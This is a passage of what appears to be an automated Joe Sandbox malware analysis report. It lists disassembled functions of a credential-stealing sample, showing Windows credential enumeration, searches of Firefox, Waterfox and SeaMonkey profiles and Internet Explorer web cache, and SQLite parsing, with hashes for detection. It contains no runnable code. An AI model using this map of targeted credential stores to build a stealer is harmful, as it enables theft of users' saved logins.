                    • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                    • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                    • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                    • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                    Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                    • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                    • wcslen.MSVCRT ref: 0040BE06
                    • _wcsncoll.MSVCRT ref: 0040BE38
                    • memset.MSVCRT ref: 0040BE91
                    • memcpy.MSVCRT ref: 0040BEB2
                    • _wcsnicmp.MSVCRT ref: 0040BEFC
                    • wcschr.MSVCRT ref: 0040BF24
                    • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                    • String ID:
                    • API String ID: 3191383707-0
                    • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                    • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                    • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                    • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                    Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00403CBF
                    • memset.MSVCRT ref: 00403CD4
                    • memset.MSVCRT ref: 00403CE9
                    • memset.MSVCRT ref: 00403CFE
                    • memset.MSVCRT ref: 00403D13
                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                    • memset.MSVCRT ref: 00403DDA
                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                    • String ID: Waterfox$Waterfox\Profiles
                    • API String ID: 3527940856-11920434
                    • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                    • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                    • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                    • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                    Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00403E50
                    • memset.MSVCRT ref: 00403E65
                    • memset.MSVCRT ref: 00403E7A
                    • memset.MSVCRT ref: 00403E8F
                    • memset.MSVCRT ref: 00403EA4
                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                    • memset.MSVCRT ref: 00403F6B
                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                    • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                    • API String ID: 3527940856-2068335096
                    • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                    • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                    • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                    • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                    Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00403FE1
                    • memset.MSVCRT ref: 00403FF6
                    • memset.MSVCRT ref: 0040400B
                    • memset.MSVCRT ref: 00404020
                    • memset.MSVCRT ref: 00404035
                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                    • memset.MSVCRT ref: 004040FC
                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                    • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                    • API String ID: 3527940856-3369679110
                    • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                    • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                    • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                    • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                    Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                    • API String ID: 3510742995-2641926074
                    • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                    • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                    • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                    • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                    Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                      • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                      • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                    • memset.MSVCRT ref: 004033B7
                    • memcpy.MSVCRT ref: 004033D0
                    • wcscmp.MSVCRT ref: 004033FC
                    • _wcsicmp.MSVCRT ref: 00403439
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                    • String ID: $0.@
                    • API String ID: 3030842498-1896041820
                    • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                    • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                    • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                    • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                    Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                    • String ID:
                    • API String ID: 2941347001-0
                    • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                    • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                    • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                    • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                    Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00403C09
                    • memset.MSVCRT ref: 00403C1E
                      • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                      • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                    • wcscat.MSVCRT ref: 00403C47
                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                    • wcscat.MSVCRT ref: 00403C70
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memsetwcscat$Closewcscpywcslen
                    • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                    • API String ID: 3249829328-1174173950
                    • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                    • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                    • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                    • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                    Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040A824
                    • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                    • wcscpy.MSVCRT ref: 0040A854
                    • wcscat.MSVCRT ref: 0040A86A
                    • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                    • String ID:
                    • API String ID: 669240632-0
                    • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                    • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                    • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                    • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                    Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                    Download Yara Rule
                    APIs
                    • wcschr.MSVCRT ref: 00414458
                    • _snwprintf.MSVCRT ref: 0041447D
                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                    • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                    • String ID: "%s"
                    • API String ID: 1343145685-3297466227
                    • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                    • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                    • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                    • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                    Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                    • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                    • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProcProcessTimes
                    • String ID: GetProcessTimes$kernel32.dll
                    • API String ID: 1714573020-3385500049
                    • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                    • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                    • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                    • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                    Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 004087D6
                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                      • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                    • memset.MSVCRT ref: 00408828
                    • memset.MSVCRT ref: 00408840
                    • memset.MSVCRT ref: 00408858
                    • memset.MSVCRT ref: 00408870
                    • memset.MSVCRT ref: 00408888
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                    • String ID:
                    • API String ID: 2911713577-0
                    • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                    • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                    • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                    • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                    Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcmp
                    • String ID: @ $SQLite format 3
                    • API String ID: 1475443563-3708268960
                    • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                    • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                    • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                    • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                    Function 00414C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                    • memset.MSVCRT ref: 00414C87
                    • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                    • wcscpy.MSVCRT ref: 00414CFC
                      • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                    Strings
                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressCloseProcVersionmemsetwcscpy
                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                    • API String ID: 2705122986-2036018995
                    • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                    • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                    • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                    • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                    Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _wcsicmpqsort
                    • String ID: /nosort$/sort
                    • API String ID: 1579243037-1578091866
                    • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                    • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                    • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                    • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                    Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040E60F
                    • memset.MSVCRT ref: 0040E629
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    Strings
                    • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                    • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                    • API String ID: 3354267031-2114579845
                    • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                    • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                    • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                    • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                    Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                    Download Yara Rule
                    APIs
                    • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                    • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                    • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                    • LockResource.KERNEL32(00000000), ref: 004148EF
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Resource$FindLoadLockSizeof
                    • String ID:
                    • API String ID: 3473537107-0
                    • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                    • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                    • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                    • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                    Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                    • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                    • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                    • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                    Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset
                    • String ID: only a single result allowed for a SELECT that is part of an expression
                    • API String ID: 2221118986-1725073988
                    • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
